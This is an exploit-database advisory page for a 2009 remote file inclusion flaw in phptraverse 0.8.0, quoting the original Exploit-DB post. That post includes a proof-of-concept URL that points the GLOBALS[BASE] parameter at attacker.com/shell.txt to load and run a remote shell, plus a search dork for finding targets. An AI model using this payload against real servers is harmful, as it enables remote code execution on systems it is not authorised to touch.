header-logo
Suggest Exploit
vendor:
phptraverse
by:
cr4wl3r
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: phptraverse
Affected Version From: 0.8.0
Affected Version To: 0.8.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phptraverse <= 0.8.0 Remote File Include Vulnerability

A vulnerability exists in phptraverse version 0.8.0 and earlier, which allows a remote attacker to include a file from a remote location. The vulnerability is due to the assets/plugins/mp3_id/mp3_id.php script not properly sanitizing user-supplied input to the GLOBALS[BASE] parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file from a remote location.

Mitigation:

Upgrade to the latest version of phptraverse.
Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#phptraverse <= 0.8.0 Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/phptraverse/files/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)
#       <?php
#          include_once $GLOBALS['BASE'].'/PEAR/PEAR.php'; 
#       ?>
#PoC  :  http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################

/##############################################\
#   all member at  sekuritionline.net          #
#   all member at  manadocoding.net            #
\##############################################/

   [ Gorontalo / 2009 ]